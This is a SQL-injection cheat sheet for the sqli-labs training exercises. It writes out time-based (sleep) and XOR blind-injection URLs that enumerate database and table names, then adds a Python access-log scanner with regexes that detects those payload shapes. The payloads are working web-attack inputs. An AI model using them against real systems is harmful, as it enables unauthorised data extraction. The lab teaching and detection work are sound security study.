IF() statement structure
if(condition, expr_if_true, expr_if_false)
if(length(database())>10,sleep(3),1)
Time-based injection (if the response is delayed by about 3 seconds, the condition is true)
Database name length:
http://localhost/sqli/Less-2/?id=1 and if(length(database())>8,sleep(3),1)--+
Length of other database names:
http://localhost/sqli/Less-2/?id=1 and if(length((select schema_name from information_schema.schemata limit 0,1))=6,sleep(3),1)--+
Database name, character by character:
http://localhost/sqli/Less-2/?id=1 and if(ascii(substr(database(),1,1))>32,sleep(3),1)--+
Table name length:
http://localhost/sqli/Less-2/?id=1 and if(length((select table_name from information_schema.tables where table_schema=database() limit 1,1))=6,sleep(3),1)--+
Adapt the remaining payloads yourself in the same way.
XOR (^)
1'^(ascii(substr(database(),1,1))>32) --+
XOR injection (a true condition flips the result of 1^(...) to 0, so the page content changes)
Database name length:
http://localhost/sqli/Less-8/?id=1'^(length(database())>8) --+
Length of other database names:
http://localhost/sqli/Less-2/?id=1'^(length((select schema_name from information_schema.schemata limit 0,1))=6)--+
Database name, character by character:
http://localhost/sqli/Less-8/?id=1'^(ascii(substr(database(),1,1))>32) --+
Table name length:
http://localhost/sqli/Less-8/?id=1'^(length((select table_name from information_schema.tables where table_schema=database() limit 1,1))=6) --+
Adapt the remaining payloads yourself in the same way.
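From the defender's side, both the time-based and the XOR sections above leave a recognisable shape in the web server's access log. The following is an added example, not part of the original cheat sheet: a small Python scanner that URL-decodes the query string of each log line and tags the if(...,sleep(n),...) and '^(...) patterns plus information_schema/database() probes. The log lines are constructed for the demo and the regexes are assumptions, not a vendor rule.

```python
import re
from urllib.parse import unquote_plus

# Patterns derived from the payload shapes on the page (assumptions, not a vendor rule).
TIME_BASED = re.compile(r"\bif\s*\(.*?\bsleep\s*\(\s*\d+", re.I | re.S)
XOR_BOOLEAN = re.compile(r"['\"\d)]\s*\^\s*\(", re.I)
SCHEMA_PROBE = re.compile(r"information_schema\.|\bdatabase\s*\(\s*\)", re.I)
REQ_RE = re.compile(r'"(?:GET|POST) (\S+) ')

# Constructed sample access-log lines (common log format); not real traffic.
LOG_LINES = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /sqli/Less-2/?id=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /sqli/Less-2/?id=1%20and%20if(length(database())%3E8,sleep(3),1)--+ HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /sqli/Less-8/?id=1%27%5E(ascii(substr(database(),1,1))%3E32)%20--+ HTTP/1.1" 200 87',
    '10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /search?q=x%5Ey HTTP/1.1" 200 100',
]


def classify(line):
    """Tag one log line: 'time-based', 'xor-boolean' and/or 'schema-probe'."""
    m = REQ_RE.search(line)
    if not m:
        return []
    target = m.group(1)
    # Decode once: browsers and tools URL-encode the payloads shown on the page.
    query = unquote_plus(target.split("?", 1)[1]) if "?" in target else ""
    tags = []
    if TIME_BASED.search(query):
        tags.append("time-based")
    if XOR_BOOLEAN.search(query):
        tags.append("xor-boolean")
    if SCHEMA_PROBE.search(query):
        tags.append("schema-probe")
    return tags


def scan(lines):
    """Map each flagged source IP to the set of tags seen; clean lines are skipped."""
    hits = {}
    for line in lines:
        tags = classify(line)
        if tags:
            hits.setdefault(line.split()[0], set()).update(tags)
    return hits


if __name__ == "__main__":
    for ip, tags in scan(LOG_LINES).items():
        print(ip, sorted(tags))
```

The plain `x^y` query is deliberately not flagged, since a bare caret is common in ordinary input. To confirm a time-based attempt rather than only suspect it, log the response time per request (for example Apache's `%D` in LogFormat) and correlate the sleep(n) hits with responses that took about n seconds longer than normal.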